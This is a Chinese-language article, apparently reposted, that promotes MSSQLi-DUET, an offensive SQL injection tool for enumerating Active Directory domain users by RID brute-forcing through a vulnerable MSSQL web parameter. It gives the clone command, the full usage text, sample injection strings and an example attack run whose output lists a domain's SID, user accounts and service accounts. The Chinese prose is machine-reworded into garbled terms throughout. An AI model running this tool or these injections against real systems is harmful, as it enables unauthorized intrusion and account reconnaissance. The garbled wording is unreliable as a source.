MSSQLi
MSSQLi-DUET
MSSQLi-DUET是一款对于MSSQL数据库查询的SQL引入脚本制作,它可以运用RID工程爆破技术性来从一个活动目录自然环境中获取出域客户信息。该专用工具适用各种各样Web运用服务器防火墙绕开技术性,而且完成了SQLMap Temper作用。此外,众多科学研究工作人员还能够依据自身的要求及其总体目标自然环境来独立应用在其中的Temper作用。
该专用工具有二种应用方法,一种是立即以Python脚本制作的方法在cmd终端设备中应用,另一种便是以Burp Suite软件的方式应用,这类方式 能够应用简易的GUI导航栏。
当今版本号的MSSQLi-DUET仅适用根据Union的引入方法,以后大家会开展很多检测来确保别的引入技术性的可靠性和精确性。
专用工具免费下载
众多科学研究工作人员能够应用以下指令将MSSQLi-DUET新项目源代码复制至当地:
git clone https://github.com/Keramas/mssqli-duet.git
专用工具应用
Burp Suite软件应用
在将软件提交至Burp Suite中以后,鼠标右键点一下一个要求,随后挑选将其发给MSSQLi-DUET。接着,大量的有关主要参数和详细资料都将显示信息给客户
要求可能添充要求对话框,点一下运作輸出以后,大家就可以立即查询到輸出結果了:
Python脚本制作应用
脚本制作协助信息内容:
python3 mssqli-duet.py -h
usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
[-o OUTFILE] -r REQUEST_FILE
MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool
optional arguments:
-h, --help show this help message and exit
-i INJECTION, --injection INJECTION
Injection point. Provide only the data needed to
escape the query.
-e ENCODING, --encoding ENCODING
Type of encoding: unicode, doubleencode, unmagicquotes
-t TIME_DELAY, --time_delay TIME_DELAY
Time delay for requests.
-rid RID_RANGE, --rid_range RID_RANGE
Hypenated range of RIDs to bruteforce. Ex: 1000-1200
-ssl SSL, --ssl SSL Add flag for HTTPS
-p PARAMETER, --parameter PARAMETER
Vulnerable parameter
-proxy PROXY, --proxy PROXY
Proxy connection string. Ex: 127.0.0.1:8080
-o OUTFILE, --outfile OUTFILE
Outfile for username enumeration results.
-r REQUEST_FILE, --request_file REQUEST_FILE
Raw request file saved from Burp
Prepare to be enumerated!
怎么使用?
如果你在一个总体目标程序运行中取得成功鉴别出了一个根据Uion引入的引入点,你也就能够立即应用Burp Suite的“copy to file”作用来获得到要求数据库了。
应用-r选择项将储存的要求信息内容发给MSSQLi-DUET,并特定系统漏洞主要参数和引入点信息内容。例如,假如系统漏洞主要参数为“element”,引入种类为SQL引入,那麼-p变量值便是“element”,MSSQLi-DUET可能全自动搭建SQL引入查寻。演试样比如下:
Ex: test'
test'))
test")"
专用工具应用示例
python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080
[ ] Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded
[ ] Determining the number of columns in the table...
[!] Number of columns is 3
[ ] Determining column type...
[!] Column type is null
[ ] Discovering domain name...
[ ] Domain = NEUTRINO
[ ] Discovering domain SID...
S-1-5-21-4142252318-1896537706-4233180933-
[ ] Enumerating Active Directory via SIDs...
NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql
常见问题
在大家的应用全过程中,很有可能必须科学研究工作人员依据总体目标数据库查询的列种类及其别的限定来对脚本制作编码开展自定改动。
新项目详细地址
MSSQLi-DUET:【GitHub传送器】
相关文章
- 1条评论
- 孤央倥絔2022-05-28 07:32:01
- Python脚本制作应用 脚本制作协助信息内容: python3 mssqli-duet.py -husage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DEL